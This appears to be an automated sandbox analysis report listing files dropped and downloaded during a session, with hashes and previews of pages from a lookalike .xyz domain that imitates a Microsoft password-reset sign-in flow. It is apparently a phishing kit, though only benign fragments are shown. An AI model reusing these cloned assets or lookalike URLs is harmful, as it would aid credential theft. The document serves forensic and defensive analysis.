                                          Size (bytes):16384
                                          Entropy (8bit):0.6708622411103311
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8C5B387838B50943DA666775822BE2C6
                                          SHA1:7C49B71D1D10FC26DB032C3A4111E4AE350B7DE6
                                          SHA-256:4CCFB34C4545AE31AADE251686E98D058D0AD15F2832436B17146A98299B728A
                                          SHA-512:C0A8533126B2036C07EB75D4E3278846D16653DB2EDDE0D809BD44D0C1F5243B60B032BE5676A2F326EDFB002F7E23EDFCF0DD290BFE0A5B450CAACB24A0DDF2
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):18
                                          Entropy (8bit):2.725480556997868
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A5E51FDFAF429614FB5218AB559D299A
                                          SHA1:262EC76760BB9A83BCFF955C985E70820DF567AE
                                          SHA-256:3E82E9F60CE38815C28B0E5323268BDA212A84C3A9C7ACCC731360F998DF0240
                                          SHA-512:9B68F1C04BDE0024CECFC05A37932368CE2F09BD96C72AB0442E16C8CF5456ED9BB995901095AC1BBDF645255014A5E43AADEE475564F01CA6BE3889C96C29C9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..t.o.r.r.e.s.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9982172340025826
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:027F950843D8C763352ADBB1984A66A6
                                          SHA1:3AE67BC16421E2067A0415F5B624D56A988CBB7B
                                          SHA-256:EE86DE163D01C0660807AC24AF4522ED8B89521A626E87C93034651B2C8F36AA
                                          SHA-512:FE05B5D3065282BAC90A89EAEC51F5E853AACD8B625803BB12F7FB31004B1555DAF54324806A9611B8FE4D2E6C5B0C95F475314069DF2005160809A5C815207E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,..............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.013815907262369
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:22ABFD3CC2083881DD4063C7187FDBED
                                          SHA1:CAF028F947393F06923E2897D69272EA8868E90A
                                          SHA-256:7B412E62117332F81BE0C6489FBE7D5F62113B7208016F5A10B25B2363BCB162
                                          SHA-512:277081A7A2C41028EFDA2C0836653395E13031297D01BDE81DDFEC7BAAB3283904DAFC21EF6AF1815F0C2367EE2847174982FE270D8F93980ECFD640F359694F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2693
                                          Entropy (8bit):4.019243435044295
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:870CACC3733A2FF6B3CAB8F61998FBCF
                                          SHA1:51A7D6D8A343427D47DD092A3A637BFFB7C3F0D8
                                          SHA-256:306CF5307078FDB67FFC1648798F6D7FA6658D6F583B5FB89166A64960F7886D
                                          SHA-512:0B1F01453FC205C243E6FC656F790B2A3908B9CE8224B871737C94D5C82ABE00E469ED4881DA2A31A68B25DBB92FEA3900464B0169D1CF03C55B5BF92B6EA5AD
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.012880403553417
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C9B5184099D150B2CF745FD8E2FE2B1E
                                          SHA1:F53241B8D230605A59142FBCBCCDCB38C2AB7265
                                          SHA-256:FF18DFD8412DFBB37DE858ABFB3F61F0B2167A4CCCB324C09E89E7D2909354C1
                                          SHA-512:E03383E7A9297A0AE63EAE364D3A77758E369FD38E2E1ED0FEB3A188E5BC9AAF710B2D97D601C1C9EEE3BA7060A91A3B286D5D96565C3BD1BD2734FB352705F2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,...._...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.001715752222511
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DB9F695A4FE7E007E771C3687B20B29C
                                          SHA1:27313DC84DA22C7BE8C3D19280FB290D9393455F
                                          SHA-256:B2C51972AC70CD278A16CBE2BFE61ADDD4E027EE587B8ACB91EFDA39B848F364
                                          SHA-512:C15888805182CD13B2B4DBBE6A30401D41154B81DDB79BF3F294F39C214BE8B81026EA65100C3B8A3D5A8AC069DA5C47B4B4ADAE32922CB1B19891055895D5D1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2683
                                          Entropy (8bit):4.016008650640294
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6538730929B573040CCE8E14DC3CB319
                                          SHA1:B9DB457F4573A6209D006D59E71DA0BDE80569BC
                                          SHA-256:3114D1ACC8F2CAFC53706A0DF3BFE8CF6E90993C226430486AB384F9458D7CCE
                                          SHA-512:5DD5280DFF5F71105267894A1B58DC31AE04FCCF1F4A549C7538C089CAA42A3BDF4F1D271E112EB22B39E6E46AC8D6E1B470426D4C470BF0BCDDC4D76FCA56E1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:Microsoft Outlook email folder (>=2003)
                                          Category:dropped
                                          Size (bytes):271360
                                          Entropy (8bit):1.5030584546257866
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:25EF104F2E3983B2E519C3131563119D
                                          SHA1:E894A217D2E9EA003FFC524EF4B070905DD077AE
                                          SHA-256:AD8949151B8C09BB2BEF97955ECF113274B7EF9869C15EE6D9B94D2E9CEFB8D7
                                          SHA-512:605D57B58694DF2DA0103FA2D397B760F971755E0BBD8E723F748CC23F614B8D92B5ABF40DBF3B5F5487D194E3F298073729A2FDAD31471A8C7BB5AE755C2003
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.9645168455599279
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EC868555E4160A2DA1A8BDE780F899FB
                                          SHA1:381503C6ABE2D2251292680254D40C7E4338F4F5
                                          SHA-256:18A7794BD599230AEC805DE777E4AD9A47949EB257E89AC9A68931332B0ECFD4
                                          SHA-512:0D8F9768E5942B4435AAF353FC22F81D7B6464DAB73B2F78CD44F89005103CD762BD1F63ED05F763C2504E8FD2ACCA9573D34347C8F738608C55F24DC681FCDD
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):46419
                                          Entropy (8bit):4.76412061471262
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:576F1B10946126A427239A4584BCA912
                                          SHA1:17BEBB743334CF2D1E239AD0AFF472D1DE57AD45
                                          SHA-256:7380443A0DC6728004EE12557DB6C2E44540D8801C4D4BFC6A70F31F6E183287
                                          SHA-512:D19622ACA92CF780EDCF221E23F09AE33CE34FD7F0899F44B142BAA7BE534F8D34DD868F13AE3C5E91996AF31E776ACC1B628AD4A0FDE587C7FBC81FEBB51F58
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/js/Webtrends.js
                                          Preview:// WebTrends SmartSource Data Collector Tag..// Version: 8.6.2..// MS Version: 3.2.5..// Tag Builder Version: 3.0..// Created: 04/01/2011..function WebTrends() {.. var that = this;.. if (typeof (gDcsId) != "undefined" && gDcsId) this.dcsid = gDcsId;.. else this.dcsid = "not_a_valid_dcsid";.. if (typeof (gDomain) != "undefined" && gDomain) this.domain = gDomain;.. else this.domain = "m.webtrends.com";.. if (typeof (gTimeZone) != "undefined" && gTimeZone) this.timezone = gTimeZone;.. else this.timezone = -8;.. if (typeof (gFpcDom) != "undefined" && gFpcDom) this.fpcdom = gFpcDom;.. else {.. if (/007ec667-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz$/.test(window.location.hostname)) {.. this.fpcdom = ".microsoft.com";.. } else {.. this.fpcdom = window.location.hostname;.. }.. }.. if (typeof (gOffsite) != "undefined" && gOffsite).. if (gOffsite == true || gOffsite == "true") this.fpcdom = "";.. this.na
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):12388
                                          Entropy (8bit):4.879297491400776
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:432C0225D4F996FA527B1DDA37FAF9B1
                                          SHA1:000B0E2D9E8E70B56FCC4DD5CDE19B6B6DA2CBE4
                                          SHA-256:E7A2F12C0F145FA465B669F22F47FA9D7C43B6F67D2629FFE92F155C2FB009BF
                                          SHA-512:F857E83AEC665A71C447CBF4ACC431E38B5DE3875EE673C4A358A793459FBD93E0E0EADF20F435CE5043CF324909D5EC9456208486622BAB789DF7A37EE7302C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/css/Style.css?v=1342177280
                                          Preview:* {.. line-break: strict..}....body,..input,..select,..textarea,..button,..legend {.. font-weight: normal;.. font-family: "Segoe UI-Regular-final", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. font-size: 12px;.. line-height: 19px;.. letter-spacing: .01em;.. color: #666666..}....span.requiredstar {.. font-weight: normal;.. font-family: "Segoe UI-Regular-final", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. font-size: 12px;.. color: #a80f22..}....h1,..h2,..h3,..h4,..h5,..h6 {.. font-weight: normal;.. font-family: "SegoeUI-Light-final", "Segoe UI Light", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. color: #333333;.. margin: 0 0 0 0;.. cursor: default..}....h1 {.. font-size: 32px;.. line-height: normal;.. letter-spacing: -.01em;.. padding-left: 0px;.. padding-right: 0px..}....h2 {.. font-size: 22px;.. line-height: normal;.. letter-spacing: -.01em..}....h3 {.. font-size: 13px;
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1561
                                          Entropy (8bit):7.762338770217686
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8DC34013E911C5F68FC2BCA0400CB06F
                                          SHA1:16BAFA91AF100D65C4945F04E0C6E1643B98CF00
                                          SHA-256:795029D360C3D16233FCE96F1BFF13C261535C0885FAE806CFF766F32D96BCEE
                                          SHA-512:83ACA42A30BFD629BC1E88D3ED154475E7949C1B154D19E6C9EF1DE825BA7967C0B6DA9EE79E7B420668242CCE5931DF344C97278A254F0A72C3D09EABED6051
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 1378
                                          Category:downloaded
                                          Size (bytes):628
                                          Entropy (8bit):7.659657630123852
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:144602B9BCB69A170EE0F9E900C107F7
                                          SHA1:ABDAC4E49652003158DD7DC561C3EC7878CEBDAF
                                          SHA-256:B5099539DA34B1482C022BBC78270BF471CF9349EF84BB34CA7A02B63515FA9E
                                          SHA-512:BF80EB1F4E3AFC5568320FE865C4C1B9BE44C1363B36B82549D5344486F157905B4C6573D5CC8418BC311CCE5BBB7C93208FDD68E1A2F72CAA311D786235AA6F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/images/picker_account_aad_a8332c62695d74843a11daf39a74e552.svg
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 338 x 72, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):4020
                                          Entropy (8bit):7.929907559552797
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:36AFB641BECFAD75FED5F4E6E8C39268
                                          SHA1:2495652F017B7A06D796AFE9C4A06ECD54F9CCFE
                                          SHA-256:5C2192A3932CB78B431A1AC0F3F3D73414A31C63D5CB279F2687E58C72694200
                                          SHA-512:08C27020CF80A181B941EE144090FFBDD12ED34BA8CBEC037ACECE63F850FF8A69BE6DDB0EC24F7141C46F27779ED59AF84A55FB367C1B6F8893B444F44C5AF5
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1498
                                          Entropy (8bit):4.81759827491068
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:11FE4E6509513DB245F1F97E37C5D3AB
                                          SHA1:05322C35B6BFAE84CE8C626BD7B1F8C4A6F15A6D
                                          SHA-256:78D437B40A85299F96ED9D02E35F23FD3D3EF63D844D8D2523A15516F7E1D09C
                                          SHA-512:E8A7C3B06C54B671FF6772D6A360DD0B4A65888B4DBD32AE04D14E4971343A71E1B4EC1E58BD45898744A1B0DF4EDE24141FF47E2C0393E18AACFC97E6F10D76
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/css/ltrStyle.css?v=1342177280
                                          Preview:.paddingright { padding-right: 20px; }...paddingleft { padding-left: 20px; }...paddingright7 { padding-right: 7px; }...paddingleft7 { padding-left: 7px; }...paddingleft10 {padding-left: 10px; }...alignright { text-align: right; }...alignleft { text-align: left; }...leftalign {text-align: left; margin-left:0px;}.....borderRight {border-right: 1px solid black; padding: 0px;}.....userTypeRadioButtonMargin{margin-left: 10px; margin-top:50px;}...userVerificationInputLabel {text-align:left;padding-right: 10px;}...radioButtonMoreInformation { padding-left: 20px }.....header .logo{float:left; padding-left:30px;}.....HelpCallout td.PosRight{padding: 8px 0px 0px 0px; margin: 0px; vertical-align: top; font-size: 1px; border: none !important; background-color: transparent !important;}...HelpCallout td.PosRight > div{font-size: 1px; position: relative; left: 1px; border-bottom: none !important; border-right: none !important; border-left: none !important; width: 15px; background-color: transparent !
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51661
                                          Entropy (8bit):4.652472751486279
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5B4CF23C6F6D0EB1E95E3EA8A81FA3DB
                                          SHA1:30AB813027A11181E106EC6C6DB0B8C123F51F95
                                          SHA-256:C25E2A942969FB361CC4B9F7933702BF7101076DB08790B1B9F4B7CDB221BA49
                                          SHA-512:B02CDC61E20A82DD1C1AD0C17D79D29423964E5B741AB61065642926376351027559957B7A6C9771E623634AD1DE546CF17264A570E4C596AB1A13A41142BB72
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="../favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascr
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:dropped
                                          Size (bytes):2672
                                          Entropy (8bit):6.640973516071413
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 3808
                                          Category:downloaded
                                          Size (bytes):1451
                                          Entropy (8bit):7.846590817928699
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:98E0F18648E5CB4C1B37D5977F8D24C0
                                          SHA1:26FB20115D2CDE21C0A0A19E61EDA18528990867
                                          SHA-256:AEAA2269BF734CD85EE464274E0ED55BC409E47899EB3D7CC61AB3C1477F5625
                                          SHA-512:0C9A0DA887F654D9D42FB01F54A931EF0D0CCBA25EC5E7E4D77F491DFD373DCAF4F4D953DAB23A5DA3B5D658A59E383093A010712AECC40046B9F90C74B08CBD
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Me.htm?v=3
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 379
                                          Category:downloaded
                                          Size (bytes):254
                                          Entropy (8bit):7.073949007476455
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DE27409124B16BD9FD100A4541F14B54
                                          SHA1:071BBE8F6F76CFA82F1D565EB39899E56DC45313
                                          SHA-256:EFDBF66A9CC530152E00CEC6A67A9AD3BE5E392678CFD758671DFD72B0EDDD41
                                          SHA-512:E76D116B715763F5AE7528ADECB956CCE52D0EF920BBF05BC8E7BD04A559B08A9FE417AC05C5C3338571E25AFBE0C4C4D57A868A4E132E837179AAC5267FE824
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/images/picker_account_msa_3b879963b4f70829fd7a25cbc9519792.svg
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 190403
                                          Category:downloaded
                                          Size (bytes):61228
                                          Entropy (8bit):7.996143797222209
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:7B468040EC45597C5F38B1FC70892A04
                                          SHA1:29958B57F33405A2F5B65F8552310079D563C592
                                          SHA-256:9BC40353065A7294454D2FB384085778B585A80D8C049CA9ECF7118F313475E8
                                          SHA-512:97AC94B5D7F96AD90B11F558C95E27A839C5D5274F9869EFC4E3B34FBD06960F40986CAF2E1D2AB9B2CEDE3550B4212AD6AA1C64881EA094690EAD74A9546DB2
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 26954
                                          Category:downloaded
                                          Size (bytes):5479
                                          Entropy (8bit):7.9638991457717045
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AA2C434CD228F2F66475A3DE6563810C
                                          SHA1:D973E6EA552AD17B5379CB44A0AEE3EBFBCA0EE7
                                          SHA-256:F86E52667175BF496752323AE014CAAA4DF7C6982727815BDAD5633CFF68BCA2
                                          SHA-512:17901669B003EB648488EFA820787D6F4D10FF90D72C6C3A2CB5BEBC0E74E5D96F3005C2957EB0B037856FEB5BD0F3DFBFA1BCEF3BFB6CA4ED207D618E140D05
                                          Malicious:false
                                          Reputation:unknown
